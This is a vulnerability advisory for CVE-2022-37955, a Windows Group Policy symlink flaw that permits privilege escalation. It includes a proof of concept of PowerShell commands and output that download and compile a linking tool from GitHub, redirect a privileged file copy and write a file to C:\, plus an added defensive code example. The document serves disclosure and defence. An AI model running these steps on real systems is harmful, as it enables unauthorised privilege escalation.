usd-2022-0034 | Privilege Escalation in Microsoft Windows

Advisory ID: usd-2022-0034
Product: Microsoft Windows
Affected Version: Windows 10 (19044.1826), Windows Server 2019 (17763.3046), probably others...
Vulnerability Type: Improper Link Resolution Before File Access (CWE-59) - Privilege Escalation
Security Risk: High
Vendor URL: https://www.microsoft.com
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE-Number: CVE-2022-37955


Affected Component(s)

The vulnerability affects Group Policy Updates that contain policy settings for Internet Explorer. Not all
policy settings are affected. One of the affected policy settings is the Internet Explorer User Accelerators setting.

Description

Windows Group Policy Updates may allow low privileged user accounts to elevate their privileges by abusing symbolic file system links.

Windows Group Policies are used to control and define the working environment of users and computers within Active Directory.
They provide a great amount of control and allow administrators to centrally manage Windows settings that should be unified within an organization.
Group Policy Settings are usually defined on a domain controller and pulled regularly by domain joined computers. After pulling the
configured settings, the computer is responsible for parsing and applying the obtained policies. During this processing, it was identified
that the component responsible for parsing Internet Explorer related policy settings performs a copy operation within a user controlled
location of the file system. By using symbolic file system links, it is possible to redirect this copy operation and write user controlled
files to arbitrary locations within the file system. From here, there are many known techniques to achieve a privilege escalation, like
DLL hijacking or overwriting service executables.

Proof of Concept

When processing Internet Explorer related Group Policy Updates, the file C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt
is used for storing log data. Before overwriting the file, it is copied to C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.bak.
If a corresponding Group Policy Setting (e.g. Internet Explorer User Accelerators) is configured, both files should already be present:

C:\Users\user\AppData\Local\Microsoft\Internet Explorer>dir

   Directory of C:\Users\user\AppData\Local\Microsoft\Internet Explorer

   28/07/2022  11:39    <DIR>          .
   28/07/2022  11:39    <DIR>          ..
   28/07/2022  11:39               713 brndlog.bak
   28/07/2022  11:39               713 brndlog.txt
   ...

Since the folder C:\Users\user\AppData\Local\Microsoft\Internet Explorer is fully user controlled, it is possible to delete all items within it
(it might be the case that a process holds a lock on the directory C:\Users\user\AppData\Local\Microsoft\Internet Explorer\CacheStorage, but this
process is user controlled and can be stopped). Afterwards, tools like SharpLink can be used to create symbolic
links for the files brndlog.txt and brndlog.bak. The file brndlog.txt needs to be linked to the file that should be copied and the file brndlog.bak
should be linked to the target location within the file system.

PS C:\> echo "Hello World :D" > C:\Users\user\hello.txt
PS C:\> $c = iwr https://raw.githubusercontent.com/usdAG/SharpLink/main/SharpLink.cs -UseBasicParsing
PS C:\> Add-Type $c.Content
PS C:\> $lg = New-Object de.usd.SharpLink.LinkGroup
PS C:\> $lg.AddSymlink("C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt", "C:\Users\user\hello.txt")
PS C:\> $lg.AddSymlink("C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.bak", "C:\usd.txt")
PS C:\> $lg.Open()
[!] Junction directory C:\Users\user\AppData\Local\Microsoft\Internet Explorer isn't empty. Delete files? (y/N) y
[+] Creating Junction: C:\Users\user\AppData\Local\Microsoft\Internet Explorer -> \RPC CONTROL
[+] Creating DosDevice: Global\GLOBALROOT\RPC CONTROL\brndlog.txt -> \??\C:\Users\user\hello.txt
[+] Symlink setup successfully.
[+] Junction C:\Users\user\AppData\Local\Microsoft\Internet Explorer -> \RPC CONTROL does already exist.
[+] Creating DosDevice: Global\GLOBALROOT\RPC CONTROL\brndlog.bak -> \??\C:\usd.txt
[+] Symlink setup successfully.

After applying a Group Policy Update, the file C:\usd.txt should be created with user controlled content:

PS C:\> gpupdate /force
Updating policy...

Computer Policy update has completed successfully.
User Policy update has completed successfully.

PS C:\> dir C:\usd.txt

    Directory: C:\

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         7/28/2022  12:29 PM             34 usd.txt


PS C:\> type .\usd.txt
Hello World :D

Fix

Whenever high privileged services operate in user controlled parts of the file system, they should verify that
file operations are not redirected to unintended locations. When operating on file system regions that are controlled
by one particular user, this user should be impersonated during the operation.
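The following is an added illustration of the first recommendation above; it is not code from the advisory, from usd AG, or from Microsoft. It shows a privileged copy routine that refuses to operate when any component of the source or destination path is a reparse point (NTFS symbolic link, junction or mount point), which is exactly the condition the proof of concept relies on: the "Internet Explorer" directory is turned into a junction and the two log files into symbolic links. The function names and the paths in the usage comment are hypothetical.

```powershell
# Added example (not part of the advisory): guard a copy against redirection
# through reparse points. Function names and sample paths are hypothetical.

function Test-ReparsePointInPath {
    param([Parameter(Mandatory)][string]$Path)
    # Walk from the full path up to the drive root. A junction on the
    # directory, or a symbolic link on the file itself, both carry the
    # ReparsePoint attribute, so a single check per component suffices.
    $current = [System.IO.Path]::GetFullPath($Path)
    while ($current) {
        if (Test-Path -LiteralPath $current) {
            $item = Get-Item -LiteralPath $current -Force
            if ($item.Attributes -band [System.IO.FileAttributes]::ReparsePoint) {
                return $current      # first component that could redirect the operation
            }
        }
        $parent = [System.IO.Path]::GetDirectoryName($current)
        if (-not $parent -or $parent -eq $current) { break }
        $current = $parent
    }
    return $null                     # no reparse point found along the path
}

function Copy-ItemNoFollow {
    param(
        [Parameter(Mandatory)][string]$Source,
        [Parameter(Mandatory)][string]$Destination
    )
    foreach ($p in @($Source, $Destination)) {
        $bad = Test-ReparsePointInPath -Path $p
        if ($bad) {
            # Abort instead of following the link; a service running as SYSTEM
            # must not let a user-controlled link choose where the copy lands.
            throw "Refusing to copy: '$bad' is a reparse point (symlink/junction)"
        }
    }
    Copy-Item -LiteralPath $Source -Destination $Destination -Force
}

# Usage (hypothetical paths mirroring the layout described in the advisory):
# Copy-ItemNoFollow -Source "$env:LOCALAPPDATA\Microsoft\Internet Explorer\brndlog.txt" `
#                   -Destination "$env:LOCALAPPDATA\Microsoft\Internet Explorer\brndlog.bak"
```

A path walk like this is a check-then-act sequence, so a user who can swap a directory for a junction between the check and the copy can still win the race. It is therefore a defence-in-depth measure and not a substitute for the second recommendation: performing the operation under the impersonated user token, so that a redirected write to a location such as C:\ fails with the user's own permissions rather than succeeding with those of the service.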

Timeline

  • 2022-07-29: Vulnerability identified by Tobias Neitzel
  • 2022-08-01: Advisory submitted via MSRC
  • 2022-08-19: Vendor reports submitted vulnerability out of scope of the Microsoft Bug Bounty program
  • 2022-10-26: Vendor reports submitted vulnerability as fixed

Credits

This security vulnerability was identified by Tobias Neitzel of usd AG.